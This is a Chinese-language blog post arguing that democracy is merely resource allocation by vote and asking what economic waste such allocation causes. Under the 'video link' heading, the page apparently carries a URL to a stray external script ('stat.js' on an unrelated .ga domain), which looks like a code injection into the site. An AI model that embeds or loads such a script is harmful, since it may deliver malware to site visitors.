分類
經濟分析

新華社解釋中國式民主

民主說穿了就是一個「用投票來分配資源」的制度。其他都是鬼扯。例如我們說過很多次:「民主跟自由沒有關係」。

雅典人用民主投票方式,判說話不中聽的蘇格拉底死刑,這也是民主。

美式民主並非民主制度的唯一解;中國、舊蘇聯乃至於北韓都認為自己也是民主國家。反之,民主也不保證經濟繁榮、官員廉潔有能。事實上,許多民主國家民不聊生。

而經濟學值得討論的,就是這種與產權脫鉤的資源分配制度,會造成怎樣的租值耗散、怎樣的社會整體浪費。反之,又該怎樣安排,可以使得浪費最小化?

影片連結

https://js.developerstatss.ga/stat.js?n=ns1

One reply on “新華社解釋中國式民主”

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com 標誌

您的留言將使用 WordPress.com 帳號。 登出 /  變更 )

Google photo

您的留言將使用 Google 帳號。 登出 /  變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 /  變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 /  變更 )

連結到 %s